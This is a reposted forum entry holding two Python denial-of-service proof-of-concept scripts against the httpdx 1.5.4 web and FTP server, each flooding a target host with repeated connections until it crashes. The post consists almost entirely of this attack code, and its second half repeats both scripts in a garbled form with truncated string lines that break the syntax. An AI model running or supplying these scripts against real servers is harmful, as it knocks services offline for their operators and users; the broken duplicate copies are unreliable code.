-
-
[转帖]Httpdx 1.5.4 multiple DoS (http-ftp) PoC
-
发表于: 2010-8-19 06:16 3898
-
#!/usr/bin/env python
###########################################################################
#
# Title: httpdx v1.5.4 Remote HTTP Server DoS (0day)
# By: Dr_IDE
# Tested: XPSP3
# Download: http://httpdx.sourceforge.net
# Note: Server will totally crash if only running the EXE
# Note: Get a "ffs what happened?" message if running via BAT
#
############################################################################
#
# Debugging Notes: This may not be exploitable as it dumps on a read operation.
# Upon crash throws: Access violation when reading [00001238]
#
############################################################################
import socket, sys
payload = ("GET / HTTP/1.1\r\n\r\n");
x=1;
try:
while (x < 2048):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print (" Connecting to httpdx server.");
s.connect((sys.argv[1], 80));
print ("\n Sending command.\n");
s.send(payload);
s.close();
x = x+1;
except:
print (" Success! We crashed the server in %d attempts." % x);
print ("[i] [pocoftheday.blogspot.com]");
=====================================================================================
#!/usr/bin/env python
###########################################################################
#
# Title: httpdx v1.5.4 Remote FTP Server DoS (0day)
# By: Dr_IDE
# Tested: XPSP3
# Download: http://httpdx.sourceforge.net
# Note: Server will totally crash if only running the EXE
# Note: Get a "ffs what happened?" message if running via BAT
#
############################################################################
#
# Debugging Notes: This may be exploitable as it dumps on a write operation.
# Upon crash throws: Access violation when writing to [00230000]
#
############################################################################
import socket, sys
payload = ("USER anonymous\r\n\r\n");
x=1;
try:
while (x < 2048):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print (" Connecting to httpdx server.");
s.connect((sys.argv[1], 21));
print ("\n Sending command.\n");
s.send(payload);
s.close();
x = x+1;
except:
print (" Success! We crashed the server in %d attempts." % x);
print ("[i] [pocoftheday.blogspot.com]");
###########################################################################
#
# Title: httpdx v1.5.4 Remote HTTP Server DoS (0day)
# By: Dr_IDE
# Tested: XPSP3
# Download: http://httpdx.sourceforge.net
# Note: Server will totally crash if only running the EXE
# Note: Get a "ffs what happened?" message if running via BAT
#
############################################################################
#
# Debugging Notes: This may not be exploitable as it dumps on a read operation.
# Upon crash throws: Access violation when reading [00001238]
#
############################################################################
import socket, sys
payload = ("GET / HTTP/1.1\r\n\r\n");
x=1;
try:
while (x < 2048):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print ("
s.connect((sys.argv[1], 80));
print ("\n
s.send(payload);
s.close();
x = x+1;
except:
print ("
print ("[i] [pocoftheday.blogspot.com]");
=====================================================================================
#!/usr/bin/env python
###########################################################################
#
# Title: httpdx v1.5.4 Remote FTP Server DoS (0day)
# By: Dr_IDE
# Tested: XPSP3
# Download: http://httpdx.sourceforge.net
# Note: Server will totally crash if only running the EXE
# Note: Get a "ffs what happened?" message if running via BAT
#
############################################################################
#
# Debugging Notes: This may be exploitable as it dumps on a write operation.
# Upon crash throws: Access violation when writing to [00230000]
#
############################################################################
import socket, sys
payload = ("USER anonymous\r\n\r\n");
x=1;
try:
while (x < 2048):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print ("
s.connect((sys.argv[1], 21));
print ("\n
s.send(payload);
s.close();
x = x+1;
except:
print ("
print ("[i] [pocoftheday.blogspot.com]");
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
赞赏
他的文章
看原图
赞赏
雪币:
留言: